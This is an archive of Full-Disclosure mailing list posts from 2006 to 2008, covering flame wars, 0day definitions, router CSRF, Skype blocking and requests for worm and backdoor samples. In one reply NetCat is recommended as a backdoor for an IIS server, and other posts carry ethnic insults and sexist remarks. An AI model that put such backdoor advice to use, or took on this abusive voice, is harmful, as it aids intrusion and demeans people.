 On Wed, May 7, 2008 at 6:31 PM, G D Fuego [EMAIL PROTECTED] wrote:
 Wow.  That is a spot on description of how you are treating HD Moore and
 David Litchfield.

 I mentioned a project HD Moore is working on called Metasploit and
 questioned weather he had managed to pick up any government contracts.
 I said in my opinion Metasploit is a script kiddie tool. I can't see
 any cyberstalking there.

 Secondly, I said David Litchfield's research was responsible for the
 SQL Slammer Worm and it's a perfect example of why Responsible
 Disclosure is needed. Again, I can't see any Cyberstalking there.

 All the best,

 n3td3v

 On May 7, 2008, at 12:36 PM, n3td3v [EMAIL PROTECTED] wrote:

 
 
 
  On Wed, May 7, 2008 at 4:43 PM,  [EMAIL PROTECTED] wrote:

   On Wed, 07 May 2008 16:24:45 BST, n3td3v said:

    And you suffer from slanderous libelous defamation disability
    disorder, a new disorder I have made up for idiots on
    Full-Disclosure.

   So you're saying he's suffering from a disorder that causes a
   disability in how well he can slander, libel, and defame somebody?
   If so, you should be glad that you weren't slandered by somebody
   *not* suffering from it
 
  Maybe not, but the situation currently on Full-Disclosure is this...
 
  False accusations. Many cyberstalkers try to damage the reputation of
  their victim and turn other people against them. They post false
  information about them on websites. They may set up their own
  websites, blogs or user pages for this purpose. They post allegations
  about the victim to newsgroups, chat rooms or other sites that allow
  public contributions, such as Wikipedia or Amazon.com.[4]
 
  Attempts to gather information about the victim. Cyberstalkers may
  approach their victim's friends, family and work colleagues to obtain
  personal information. They may advertise for information on the
  Internet, or hire a private detective. They often will monitor the
  victim's online activities and attempt to trace their IP address in an
  effort to gather more information about their victims. [5]
 
  Encouraging others to harass the victim. Many cyberstalkers try to
  involve third parties in the harassment. They may claim the victim has
  harmed the stalker or his/her family in some way, or may post the
  victim's name and telephone number in order to encourage others to
  join the pursuit.
 
  False victimization. The cyberstalker will claim that the victim is
  harassing him/her. Bocij writes that this phenomenon has been noted in
  a number of well-known cases.
 
  Attacks on data and equipment. They may try to damage the victim's
  computer by sending viruses.
 
  Ordering goods and services. They order items or subscribe to
  magazines in the victim's name. These often involve subscriptions to
  pornography or ordering sex toys then having them delivered to the
  victim's workplace.
 
  Arranging to meet. Young people face a particularly high risk of
  having cyberstalkers try to set up meetings between them.[6]
 
  Cyberstalkers meet or target their victims by using search engines,
  online forums, bulletin and discussion boards, chat rooms, Wikipedia,
  and more recently, through online communities such as MySpace,
  Facebook, Friendster and Indymedia, a media outlet known for
  self-publishing. They may engage in live chat harassment or flaming or
  they may send electronic viruses and unsolicited e-mails. [7] Victims
  of cyberstalkers may not even know that they are being stalked.
  Cyberstalkers may research individuals to feed their obsessions and
  curiosity. Conversely, the acts of cyberstalkers may become more
  intense, such as repeatedly instant messaging their targets. [8]
 
  More commonly they will post defamatory or derogatory statements about
  their stalking target on web pages, message boards and in guest books
  designed to get a reaction or response from their victim, thereby
  initiating contact. [7] In some cases, they have been known to create
  fake blogs in the name of the victim containing defamatory or
  pornographic content.
 
  When prosecuted, many stalkers have unsuccessfully attempted to
  justify their behavior based on their use of public forums, as opposed
  to direct contact. Once they get a reaction from the victim, they will
  typically attempt to track or follow the victim's internet activity.
  Classic cyberstalking behavior includes the tracing of the victim's IP
  address

Re: [Full-disclosure] RE :OT - Don't fuck with n3td3v

2008-05-07 Thread Exibar
HUH??  WTF are you talking about?  My comment was about you questioning HD 
about the Weather.


- Original Message - 
From: n3td3v [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Wednesday, May 07, 2008 2:33 PM
Subject: Re: [Full-disclosure] RE :OT - Don't fuck with n3td3v


 On Wed, May 7, 2008 at 7:23 PM, Exibar [EMAIL PROTECTED] wrote:
 n3tdunc3 said: ...mentioned a project HD Moore is working on called
 Metasploit and questioned weather...

  I honestly don't think that HD has anything to do with the weather, I
 wouldn't bother him about that.  Although, HD does have God like status,
 so perhaps he CAN control the weather Hm ;-)

  Exibar

 There is no justification for Cyberstalking, yet you try and use
 someone making constructive criticism of Metasploit as being that
 justification.

 All the best,

 n3td3v



Re: [Full-disclosure] defining 0day

2008-05-02 Thread Exibar
Exactly.

 Zero Day Exploit:  A brand new exploit.  For a brand new vulnerability that 
isn't known either public or private (private = vendor only).  The Exploit 
itself is also brand new, never before known either public or private.

  Exibar

- Original Message - 
From: Douglas K. Fischer [EMAIL PROTECTED]
To: n3td3v [EMAIL PROTECTED]
Cc: n3td3v [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; 
Gadi Evron [EMAIL PROTECTED]
Sent: Friday, May 02, 2008 3:10 PM
Subject: Re: [Full-disclosure] defining 0day


  Original Message 
 Subject: Re: [Full-disclosure] defining 0day
 From: n3td3v [EMAIL PROTECTED]
 To: Gadi Evron [EMAIL PROTECTED], full-disclosure@lists.grok.org.uk,
 n3td3v [EMAIL PROTECTED]
 Date: 04/19/2008 18:44
 On Tue, Sep 25, 2007 at 8:02 PM, Gadi Evron [EMAIL PROTECTED] wrote:

  Okay. I think we exhausted the different views, and maybe we are now
 able to come to a conclusion on what we WANT 0day to mean.

  What do you, as professional, believe 0day should mean, regardless of
 previous definitions?

  Obviously, the term has become charged in the past couple of years with
 the targeted office vulnerabilities attacks, WMF, ANI, etc.

  We require a term to address these, just as much as we do unpatched
 vulnerability or fully disclosed vulnerability.

  What other such descriptions should we consider before proceeding?
 non-disclosure?

 Gadi.



 I just caught a news article that summed up nicely what 0day means...

 A zero-day flaw is a software vulnerability that has become public
 knowledge but for which no patch is available. It is particularly
 dangerous since users are exposed from day zero until the day a vendor
 prepares a patch and notifies users it is ready.

 http://www.pcworld.com/businesscenter/article/144803/chinese_blogs_detail_zeroday_flaw_in_microsoft_works.html

 Regards,

 n3td3v

 I would actually add one more criteria. Not only would a 0day have no
 patch available, but the vulnerability being exploited would not have
 been previously announced. In other words, the very first exposure in
 the wild of a 0day would be active exploitation of an as of yet
 unknown (except of course by the exploit author) vulnerability. This
 makes a true 0day all the more potent.

 Cheers,

 Doug



Re: [Full-disclosure] [inbox] in Memory of Dude VanWinkle / Justin Plazzo

2008-02-11 Thread Exibar
It truly is a sad day today that JP died.  I know some people didn't like
his postings, but that doesn't really matter.  It's truly sad when one of
our own dies unexpectedly like this, truly sad.  Does anyone have any news
as to how this tragedy happened?

  He surely will be missed, he always added a little spice to certain
topics that will forever be gone.

  Rest in peace JP, the universe is now yours to explore...

   Exibar 


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gadi Evron
Sent: Monday, February 11, 2008 3:43 PM
To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Subject: [inbox] [Full-disclosure] in Memory of Dude VanWinkle / Justin
Plazzo

I was just woken up with the news of Justin's death and am unsure what to
think or how to respond--I need to. I feel things are left unfinished, a
light just disappeared without warning, and all I can think of is what I
said to him, when and where. Was I nice? Was I respectful? Did I always
treat him right? What could I do differently? What will our small corner of
the universe look like without him?

What's clear is that he was a good guy who strove to always do better and
was not afraid of voicing his opinion or making himself heard. He was also
quick to apologize when necessary. His opinions never stopped him from
seeing the person on the other side.

He took subjects he discussed seriously, but never lost sight of the fun. 
He never stopped learning and he evolved a great deal over the past couple
of years in which I had the opportunity to know him. One day, I was hoping
to meet him. He was a good guy.

He became an integral part of our community and only now I realize how much
that is true.

He cared. I care. He is missed.



Re: [Full-disclosure] [inbox] Xbox live accounts are being stolen

2007-08-08 Thread Exibar
charge back the charges on your card with your credit card company.  You're
not liable for any fraudulent charges on most CC's, some have a $50
deductible.

 Exibar
  -Original Message-
  From: Ashley Wilson [mailto:[EMAIL PROTECTED]
  Sent: Tuesday, August 07, 2007 5:09 PM
  To: full-disclosure@lists.grok.org.uk
  Subject: [inbox] [Full-disclosure] Xbox live accounts are being stolen


  Hey there,

  I'm so very frustrated with Microsoft and went on a search to see if
anyone else has had the same issue and lo and behold, I came across your
article of sorts.

  It's been over a month now, since I was hacked. I woke up on a Sunday
morning, check my email as I do everyday. I had 4 emails from Microsoft
stating I purchased 2 Microsoft points and a year subscription. As most
people would, I panicked and wondered what kind of insane thing happened.
When I turned on my Xbox and attempted to log into my account, I couldn't.
My boyfriend shortly after that, recovered my account on the Xbox and we
came to find out that my username had been changed, all my friends had been
deleted off my list and my motto was changed to LOL I got jacked.

  I was furious to think someone could do such a thing. They not only stole
my account but over 400 dollars was spent on my credit card.

  I called Microsoft support shortly after that. I got the run around.
Transferred to one agent and then another. They basically accused me of
giving out the information. I eventually got to speak to a supervisor, who
assured me that everything would be taken care of. They even said they would
catch the individual that did this and assured me a phone call in a few
days, as they had to send in a full investigation the next day.

  3 weeks later and I was still waiting for a call.

  I decided it was time for me to call them, since obviously I as a customer
wasn't important to them. Again, the run around. I spoke with again,
another supervisor who informed me that they hadn't even sent out the
investigation yet. He assured me that he would send it out that very day and
I should receive a call within 3 days.

  I sat home waiting to receive a call for 3 days.

  Again, I never received a phone call.

  By the 4th day, I called again.

  Speaking with an agent who assured me, I will receive a call. It's under
investigation now, you have to wait for a phone call.

  Now, 2 weeks later and I called again today.

  I'm told that they attempted to call me today and I have to wait to speak
with them because there is nothing they can do. I paid for a subscription
that I am not getting to use and apparently won't be able to use. I'd also
like to mention when he said they tried calling today, he said they left a
voice mail message. I don't have voice mail, so I got concerned. Then he
read my phone number It wasn't even my number and I had never heard the
number in my life. Slightly odd, since I gave them my phone number the
previous time I had called.

  Now I'm supposed to receive a call this Thursday. We will see I won't
hold my breath.

  I am so very frustrated that Microsoft as huge a corporation as they are,
doesn't even have the decency to call me or reimburse me for a 50 dollar
Xbox live account.

  I apologize for this longwinded email and I'm not even sure if you still
care about this issue but I was quite overjoyed to see I wasn't alone.

  Sincerely

  Ashley Wilson

Re: [Full-disclosure] [inbox] Re: Drive-by Pharming

2007-02-18 Thread Exibar
I feel this whole thing simply serves as a reminder to simply change your
default passwords on your devices.  Regardless of the type of device, CHANGE
THE DEFAULT PASSWORD!

 Exibar

 -Original Message-
 From: pagvac [mailto:[EMAIL PROTECTED]
 Sent: Saturday, February 17, 2007 6:32 PM
 To: Fabian (Lists)
 Cc: full-disclosure@lists.grok.org.uk
 Subject: [inbox] Re: [Full-disclosure] Drive-by Pharming


 I'm sorry, this looks to me like plain CSRF against web interfaces of
 intranet network devices. If someone knows your router's password
 (i.e.: default password) and the router's HTTP requests are NOT
 tokenized (vulnerable to CSRF), then an attacker can most certainly do
 anything on your behalf by tricking you to visit an evil webpage.

 Changing DNS settings is just one of the many evil things you could
 do. Others include changing password to a new one (DoS to legitimate
 router admin user), exposing the admin web interface to the Internet,
 disabling security, exposing internal hosts to the Internet through
 port-forwarding, etc...

 Of course, if the web interface is designed really badly you might not
 even need a password to CSRF it. Some of you might recall the CSRF
 issue on Linksys WRT54g reported by Ginsu Rabbit back in August 2006
 which allowed you to turn off the security of the device completely.

 Ginsu Rabbit's Advisory:

 http://www.securityfocus.com/archive/1/442452/30/0/threaded

 PoC for the vuln:

 http://ikwt.com/projects/linksys/linksys-unauth-csrf.html

 CSRFing intranet devices research published in the past:

 http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf

Am I missing something guys?

On 2/16/07, Fabian (Lists) [EMAIL PROTECTED] wrote:
 Larry Seltzer wrote:
  This response doesn't seem to address any Linksys (and therefore
  Cisco) routers, does it?

 Seems so... Maybe because they are not IOS based and therefore not real
 Cisco Routers as we all know them?

 --Fabian




--
pagvac
[http://ikwt.com/]
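
The missing check pagvac describes (requests that are "NOT tokenized"), as an added example that is not code from the thread or from any router firmware: a toy admin handler run once without and once with a per-session token. The class, field names and addresses are hypothetical, the requests are constructed dictionaries, and the password check is left out so the browser is assumed to be logged in already.

```python
import hmac
import secrets

ROUTER_ORIGIN = "http://192.168.1.1"  # constructed address of the admin UI


class RouterAdmin:
    """Toy model of a router admin interface (hypothetical, no vendor's firmware)."""

    def __init__(self, check_csrf):
        self.check_csrf = check_csrf
        self.sessions = {}             # session cookie -> CSRF token
        self.dns_server = "192.0.2.53"

    def login(self):
        """Password check omitted; returns the session cookie the browser keeps."""
        cookie = secrets.token_hex(16)
        self.sessions[cookie] = secrets.token_hex(32)
        return cookie

    def settings_form_token(self, cookie):
        """Token the router embeds as a hidden field in its own settings form."""
        return self.sessions[cookie]

    def post_dns(self, request):
        """Handle a POST of the DNS form; returns an HTTP-style status code."""
        expected = self.sessions.get(request.get("cookie"))
        if expected is None:
            return 401                      # not logged in
        if self.check_csrf:
            origin = request.get("origin")
            if origin is not None and origin != ROUTER_ORIGIN:
                return 403                  # sent from another site's page
            sent = request.get("form", {}).get("csrf_token")
            if not isinstance(sent, str) or not hmac.compare_digest(
                    sent.encode(), expected.encode()):
                return 403                  # token missing or wrong
        self.dns_server = request["form"]["dns"]
        return 200


def demo(check_csrf):
    """Send a cross-site POST, then the router's own form, to one router."""
    router = RouterAdmin(check_csrf)
    cookie = router.login()
    # Built by a page on another site: the browser attaches the cookie
    # automatically, but that page cannot read the token in the router's form.
    cross_site = {"cookie": cookie, "origin": "http://other-site.example",
                  "form": {"dns": "198.51.100.7"}}
    first = router.post_dns(cross_site)
    dns_after_cross_site = router.dns_server
    # Submitted from the router's own settings page, token included.
    own_form = {"cookie": cookie, "origin": ROUTER_ORIGIN,
                "form": {"dns": "192.0.2.54",
                         "csrf_token": router.settings_form_token(cookie)}}
    second = router.post_dns(own_form)
    return first, dns_after_cross_site, second, router.dns_server


if __name__ == "__main__":
    print("without token check:", demo(False))
    print("with token check:   ", demo(True))
```
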



Re: [Full-disclosure] phishing sites examples source code

2007-02-16 Thread Exibar
yah, check your e-mail for phishing messages 
  - Original Message - 
  From: Andres Riancho 
  To: full-disclosure@lists.grok.org.uk 
  Sent: Thursday, February 15, 2007 9:13 PM
  Subject: [Full-disclosure] phishing sites examples source code


  Hi,

  For a research I'm doing I need a somehow big (around 100 would be
nice...) amount of phishing sites html code. I have googled for them but I
only get a lot of screenshots of those sites, not the actual code. Anyone has
an idea of where I could get those sites html?

  Cheers,
  -- 
  Andres Riancho




--



Re: [Full-disclosure] [inbox] Sasser or other nasty worm needed

2006-11-27 Thread Exibar
wow, the fastest way to catch any type of worm like that is to stick an
unpatched, no A/V running,  windows box out on the internet.  You'll have so
many bugs you won't know what to do with them all...

  Exibar

 -Original Message-
 From: kikazz [mailto:[EMAIL PROTECTED]
 Sent: Sunday, November 26, 2006 5:32 PM
 To: full-disclosure@lists.grok.org.uk
 Subject: [inbox] [Full-disclosure] Sasser or other nasty worm needed


 I'm a high school network administration teacher looking for a creative
 means of teaching my students the importance of patch management.  I was
 hoping to let a particularly nasty worm loose on a closed lab so my students
 could see what happens during an outbreak, but I'm running into a hitch - I
 can't find a worm that would spread quickly enough to be useful.

 Does anyone have a copy of Sasser or a similar worm that they would be
 willing to send or link me to?  Please contact me off-list.  I would be
 happy to verify my identity as a high school teacher off-list as I'm sure
 that is a concern for most anyone who has what I am looking for.

 Please do not reply on list as I am not currently a member.

 Thank you,

 Chris



Re: [Full-disclosure] [inbox] Re: MS are doing Windows Updates for XP to IE7

2006-10-29 Thread Exibar
IE6 is still people's web browser, why should MS shove IE7 down our
throats?  Automatic update should be flexible enough to give you a no IE
upgrade, patches only checkbox...

  Exibar

 -Original Message-
 From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
 Sent: Sunday, October 29, 2006 7:26 PM
 To: [EMAIL PROTECTED]
 Cc: full-disclosure@lists.grok.org.uk
 Subject: [inbox] Re: [Full-disclosure] MS are doing Windows Updates for
 XP to IE7


 On Mon, 30 Oct 2006 12:48:13 +1300, Nick FitzGerald said:
   Well, yes, if you are (a) clued and (b) know it's coming. If you've got it
   set to download-and-install at 3AM every Wednesday morning, you may be in for
   a surprise
 
  If you're _NOT_ clued enough to know better then you deserve the
  automatic, silent IE 7 upgrade.
 
  MS got this right.

 I didn't say MS didn't get this right, in fact I agree that this is the way
 it should work.

 Doesn't change the fact that several hundred million unclued users are likely
 to wonder what happened to their IE6. ;)




Re: [Full-disclosure] [inbox] Re: [ Capture Skype trafic ]

2006-10-29 Thread Exibar
I'm sorry, but that document outlines HOW Bluecoat can and does block Skype.
A packet or protocol analyzer Proxy will block anything that is NOT
conforming HTTP to travel along on port 80.  Skype does not conform to HTTP
standards (for one it's encrypted) and BlueCoat will stop it.
  Yup, you can't be a moron and have every other port under the sun open on
your network too



STEP 4: INSTALL SSL CONTROLS ON THE BLUE COAT SG
The Blue Coat SG appliances managing application service ports for HTTP
(80), RTSP (554), MMS (1755), etc. will drop client connections if the
packets sent do not conform to the appropriate protocol. When Skype uses
port 80, the protocol used is still Skype’s proprietary protocol and does
not conform to HTTP and so will be blocked. The Skype application finally
attempts to use port 443, if the SSL controls are installed (part of SGOS
v4.2) these packets will also be dropped as there is no SSL certificate
exchanged between Skype nodes. Therefore, any attempt to establish a
Super-node connection through these service ports will be unsuccessful, as
the connection is nonconforming to standards.



 -Original Message-
 From: Tyop? [mailto:[EMAIL PROTECTED]
 Sent: Friday, October 27, 2006 2:19 PM
 To: Exibar; full-disclosure@lists.grok.org.uk
 Subject: [inbox] Re: [Full-disclosure] [ Capture Skype trafic ]


 On 10/27/06, Exibar [EMAIL PROTECTED] wrote:
  From: Tyop? [EMAIL PROTECTED]
   All is in the mail's subject.
   I need to match this crazy-encrypted-random trafic,
   to destroy it (I think I'm not alone to need informations on this
   product).
   I've found some work on the BlackHats slides,
   but skype updates..
  use a packet analyzer proxy  bluecoat comes to mind as one that works
  quite well...

 http://www.bluecoat.com/downloads/whitepapers/BCS_controlling_skype_wp.pdf
 Bluecoat doesn't match the packets, sorry.

 quote:
 It is also recommended that enterprises block downloads of URLs ending
 with skype.exe. This will prevent new Skype software from being
 downloaded to enterprise machines.

 This is very funny. ^-^

 --
 Tyop?
 Please excuse my english.




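The per-port conformance rule from the quoted Blue Coat excerpt, sketched as an added Python example; it is not Blue Coat's implementation and not part of any post in this thread. The function names, the default-deny for ports without a check, and every sample byte string are assumptions constructed for illustration, and the port 443 check inspects only the client's first TLS record, whereas the control in the excerpt depends on the certificate exchange.

```python
"""Added example: per-port protocol conformance check on a connection's first bytes."""
import re
import struct

_TOKEN = rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"            # RFC 9110 "token" characters
_REQUEST_LINE = re.compile(                            # method SP target SP version CRLF
    rb"^" + _TOKEN + rb" [\x21-\x7e]+ HTTP/\d\.\d\r\n"
)
_HEADER_LINE = re.compile(rb"^" + _TOKEN + rb":[ \t]*[\x20-\x7e\t]*$")


def conforms_http_request(data: bytes) -> bool:
    """True if data holds a complete, well-formed HTTP/1.x request head."""
    match = _REQUEST_LINE.match(data)
    end = data.find(b"\r\n\r\n")
    if not match or end == -1:
        return False              # not HTTP, or head still incomplete (caller may buffer)
    header_block = data[match.end():end]
    lines = header_block.split(b"\r\n") if header_block else []
    return all(_HEADER_LINE.match(line) for line in lines)


def conforms_tls_client_hello(data: bytes) -> bool:
    """True if data starts with a TLS handshake record carrying a ClientHello."""
    if len(data) < 5 + 4 + 2 + 32:    # record hdr + handshake hdr + version + random
        return False
    ctype, major, minor, rec_len = struct.unpack("!BBBH", data[:5])
    if ctype != 0x16 or major != 3 or minor > 4:
        return False                  # not a handshake record, or not an SSL3/TLS version
    if not (4 + 2 + 32) <= rec_len <= 2 ** 14:
        return False                  # too short for a ClientHello, or over the record limit
    hs_type, hs_len = data[5], int.from_bytes(data[6:9], "big")
    # hs_len + 4 == rec_len for a one-record ClientHello; larger if it spans records.
    return hs_type == 0x01 and hs_len + 4 >= rec_len and data[9] == 3


# One conformance check per managed service port (hypothetical policy table).
SERVICE_CHECKS = {80: conforms_http_request, 443: conforms_tls_client_hello}


def verdict(port: int, first_bytes: bytes) -> str:
    """Return "allow" or "drop" for the first client bytes seen on a port."""
    check = SERVICE_CHECKS.get(port)
    if check is None:
        return "drop"                 # assumption: ports without a check are closed
    return "allow" if check(first_bytes) else "drop"


def _build_client_hello() -> bytes:
    """Constructed minimal ClientHello (TLS 1.2, one cipher suite, no extensions)."""
    body = (b"\x03\x03" + bytes(range(32))   # client_version, fixed 32-byte random
            + b"\x00"                        # empty session_id
            + b"\x00\x02\x00\x2f"            # cipher_suites: length 2, one suite
            + b"\x01\x00")                   # compression_methods: length 1, null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + len(handshake).to_bytes(2, "big") + handshake


# Constructed sample inputs; none of these is captured traffic.
SAMPLE_HTTP = (b"GET /index.html HTTP/1.1\r\n"
               b"Host: intranet.example\r\nUser-Agent: demo\r\n\r\n")
SAMPLE_CLIENT_HELLO = _build_client_hello()
SAMPLE_OPAQUE = bytes.fromhex("9f3c17e2a4b85d0c71e6f2038bd94a6e5510c7fa2e")


def demo():
    """Run every sample against ports 80 and 443 and collect the verdicts."""
    samples = {"http": SAMPLE_HTTP, "client_hello": SAMPLE_CLIENT_HELLO,
               "opaque": SAMPLE_OPAQUE}
    return [(name, port, verdict(port, data))
            for name, data in samples.items() for port in (80, 443)]


if __name__ == "__main__":
    for name, port, result in demo():
        print(f"{name:13s} port {port:<4d} {result}")
```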


Re: [Full-disclosure] [ Capture Skype trafic ]

2006-10-27 Thread Exibar
use a packet analyzer proxy  bluecoat comes to mind as one that works 
quite well...

  Exibar


- Original Message - 
From: Tyop? [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Sent: Friday, October 27, 2006 7:27 AM
Subject: [Full-disclosure] [ Capture Skype trafic ]


 All is in the mail's subject.
 I need to match this crazy-encrypted-random trafic,
 to destroy it (I think I'm not alone to need informations on this 
 product).
 I've found some work on the BlackHats slides,
 but skype updates..

 Thx in advance.

 -- 
 Tyop? Student.
 Excuse my english.



Re: [Full-disclosure] As long as you guys are THIS easy to troll let mesay..

2006-10-13 Thread Exibar



lets not forget:

10. Car salesmen are assholes
11. any salesman is an asshole
12. n3td3v is still an id10t a$$h0l3, even tho he's finally gone away (his
mommy grounded him from the internet me-thinks)



  - Original Message - 
  From: Jeb Osama 
  To: full-disclosure@lists.grok.org.uk 
  Sent: Friday, October 13, 2006 12:27 PM
  Subject: [Full-disclosure] As long as you guys are THIS easy to troll let mesay..

  As long as you guys are THIS easy to troll let me say..

  1. Americans are assholes.
  2. Racists are assholes
  3. French are assholes
  4. Hitler was an asshole
  5. Right-wingers are assholes
  6. The GODWIN guy was an asshole
  7. The UN is an um.. asshole organisation

  Come on.. you know you GOT TO reply to one of those..

  Jeb

  PS : Not to forget..
  8. Arabs are assholes
  and not to forget 
  9. computer salesmen.. man, they're assholes too!
  
  


Re: [Full-disclosure] [inbox] ****[ NOT SPAM ]****

2006-10-13 Thread Exibar



Are we going to have to add a number 14 to that assholes list?

  -Original Message-
  From: scripteaze [mailto:[EMAIL PROTECTED]
  Sent: Friday, October 13, 2006 1:46 PM
  To: full-disclosure@lists.grok.org.uk
  Subject: [inbox] [Full-disclosure] [ NOT SPAM ]

  I subscribed to this list because I wanted to be updated with the latest 
  security issues, not to listen to children (trolls or skilled)
  
  This is the type of stuff you get when you become a member to some "media 
  whore elite Hax0rs" site which there are a million of those.
  
  This list is and should be kept professional. Let's all just move on and 
  drop all the BS, remember where and who you are and why you're here to begin 
  with..

  -- 
  -=scripteaze=-

Re: [Full-disclosure] Good ASP backdoor?

2006-09-14 Thread Exibar
NetCat is a tried and true favorite


- Original Message - 
From: Lachniet, Mark [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Thursday, September 14, 2006 2:44 PM
Subject: [Full-disclosure] Good ASP backdoor?


 Can anyone suggest a good backdoor for placing on a IIS server when you
 can upload a file to document root?  For example an all-in-one tool with
 upload, download, command execution, etc.  There are several basic ones
 out there - I was wondering if anyone ever wrote a really spiffy one.
 
 Thanks in advance,
 
 Mark Lachniet
 


Re: [Full-disclosure] CENSORED is watching you!!!

2006-08-20 Thread Exibar



SHH!!! we're finally rid of him! Never ever EVER speak his name again

  -Original Message-
  From: yearsilent [mailto:[EMAIL PROTECTED]
  Sent: Saturday, August 19, 2006 5:40 AM
  To: vodka hooch; full-disclosure@lists.grok.org.uk
  Subject: [inbox] Re: [Full-disclosure] n3td3v is watching you!!!

  back to home, and watch you mother !

  vodka hooch [EMAIL PROTECTED] wrote: 
  
the biggest hackers is watching google and yahoo

we watch fd too

people think we disappear

we still strong

we biggest hackers around

big bad hackers!

you think you can bad mouth n3td3v in threads and talk about mail 
filters

we beat mail filter, we beat everyone

governments, businesses and everyone!

we got techniques to penetrate windows vista

windows vista hacks be made public soon

we distribute on public list

you think you win, no n3td3v win

n3td3v not just one person, we big

you think we lamers, no we hav 0day programs and techniques

we can engineer the security industry and make things happen

to get securityfocus.com and news.com to write stories

we not care anymore what people think we do our own thing

n3td3v security group are best, we is new movement

you not say anything to change what we is

we new, we big, we bold

we here to stay

n3td3v



Re: [Full-disclosure] n3td3v please shutup, please shutup.

2006-07-31 Thread Exibar



Someone take pictures of this n3td3v chick at Con, I wanna see what she looks like..

  - Original Message - 
  From: codeslag 
  To: full-disclosure@lists.grok.org.uk 
  Sent: Monday, July 31, 2006 8:31 AM
  Subject: [Full-disclosure] n3td3v please shutup, please shutup.

  Right, i've kept quiet and read your bullshit for a good while 
  now so I thought i'd add to the noise on this list and say:

  IM GONNA COME TO DEFCON AND BEAT THE LIVING SHIT OUT OF YOU.

  EOF
  
  


Re: [Full-disclosure] Please help to spam [EMAIL PROTECTED]

2006-07-25 Thread Exibar
Sorry didn't mean to offend with the Bikini comments  any reasonable way 
huh?  How about sending a picture of yourself holding a small sign that says 
Full-Disclosure is Awesome!  and that very long number that was sent to 
you previously on the bottom of the sign :-)



  ok, seriously now, it would be interesting to see how many pieces of spam 
you're receiving after this whole thing :-)


 Ex

- Original Message - 
From: [EMAIL PROTECTED]

To: Cardoso [EMAIL PROTECTED]
Cc: Full Disclosure full-disclosure@lists.grok.org.uk
Sent: Monday, July 24, 2006 9:40 PM
Subject: Re: [Full-disclosure] Please help to spam [EMAIL PROTECTED]


hey guys, language please.

   i can show you i'm the master of [EMAIL PROTECTED] in any
reasonable way. i use this address to collect spam and check most of
receives in it. so don't be so sensitive, hackers!


--
http://www.lwang.org
mailto:[EMAIL PROTECTED]

2006/7/25, Cardoso [EMAIL PROTECTED]:

Based on the last australian IT Babes calendar, I advise you to scrap
the bikini idea.




On Mon, 24 Jul 2006 14:47:45 -0400
[EMAIL PROTECTED] wrote:

V On Mon, 24 Jul 2006 14:37:31 EDT, Exibar said:
V  I think we should have Alice pose in a bikini or less for us and send us
V  a few pictures.  As even that we have zero idea if that's the real Alice, at
V  least we'll have some pictures of someone that could be named Alice in a
V  bikini or less :-)
V
V Might want to make sure Alice isn't a great-grandmother first. :)
V

year(now) + 1 will be the year of linux!
Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299
digital life: http://www.contraditorium.com personal site and blog: 
http://www.carloscardoso.com






--
Have a Good Day



Re: [Full-disclosure] Please help to spam [EMAIL PROTECTED]

2006-07-24 Thread Exibar

LOL. I think it's her husband and that they're going through a messy
divorce and he wants to trash her e-mail address with as much spam as 
possible.


Exibar


- Original Message - 
From: Brian Eaton [EMAIL PROTECTED]

To: Full Disclosure full-disclosure@lists.grok.org.uk
Sent: Monday, July 24, 2006 1:24 PM
Subject: Re: [Full-disclosure] Please help to spam [EMAIL PROTECTED]



On 7/24/06, Paul Schmehl [EMAIL PROTECTED] wrote:

Alice Bryson wrote:
 Yes, i am Alice, to prove that you can send an email with a long
 number to [EMAIL PROTECTED], and i will reply you that number, ok?

What does that prove?


It would prove she can read mail sent to [EMAIL PROTECTED]  Or
that she's psychic.

Regards,
Brian



Re: [Full-disclosure] Please help to spam [EMAIL PROTECTED]

2006-07-24 Thread Exibar

snip


2 - Alice takes a picture of herself doing something silly like carving
a commodore 64 in wood or wearing a hat made of meat..

I vote for the second one. Worked with 419 scammers.
http://www.boingboing.net/2006/06/28/nigerian_letter_scam.html



snip

 I think we should have Alice pose in a bikini or less for us and send us 
a few pictures.  As even that we have zero idea if that's the real Alice, at 
least we'll have some pictures of someone that could be named Alice in a 
bikini or less :-)


  Although wearing a hat of meat is awfully funny :-)

 Exibar



Re: [Full-disclosure] Microsoft Windows Live OneCare Zero-Day

2006-06-02 Thread Exibar
OMG!!!  Someone actually wants to sign up for your little list and you're 
giving them crap and insults  just a few messages ago you were bribing 
people to join your list by offering free zero-day exploit code to anyone 
that would sign up.


make up your mind...

stop trolling leave the list and stay on your own.

Ex


- Original Message - 
From: n3td3v [EMAIL PROTECTED]

To: j w [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Friday, June 02, 2006 1:29 PM
Subject: Re: [Full-disclosure] Microsoft Windows Live OneCare Zero-Day



On 6/2/06, j w [EMAIL PROTECTED] wrote:

how do i sign up for your list?

Thanks


Hi,

If you were an international hacker you wouldn't be asking this,

please unsubscribe

Regards,

n3td3v



Re: [Full-disclosure] I'm ready to tell the police

2006-05-23 Thread Exibar
nevermind with the police  you want to talk to Dateline, or 20/20. 
Dateline is really big on the whole evil internet thing right now so they 
are ripe for this story, if it's true...


 the media is the way to go if you really want to turn the bad guys 
in.  You might even earn some credibility too


Exibar

- Original Message - 
From: n3td3v [EMAIL PROTECTED]

To: full-disclosure@lists.grok.org.uk
Sent: Sunday, May 21, 2006 8:45 PM
Subject: Re: [Full-disclosure] I'm ready to tell the police


On 5/22/06, Michael Silk [EMAIL PROTECTED] wrote:

yep, fd definitely needs its own tv show.


i'd watch it ...




You think this is a joke? n3td3v was never a joke, but everyone on fd
treated it like one. We're the biggest group around of rogue employees
at major internet companies aka dot-coms... i'm ready to walk up to my
local police station right now just get hand them in, i'm not having a
major breakdown... i've known them for 7 years and now i'm ready to hand
myself in and give evidence against these guys at yahoo



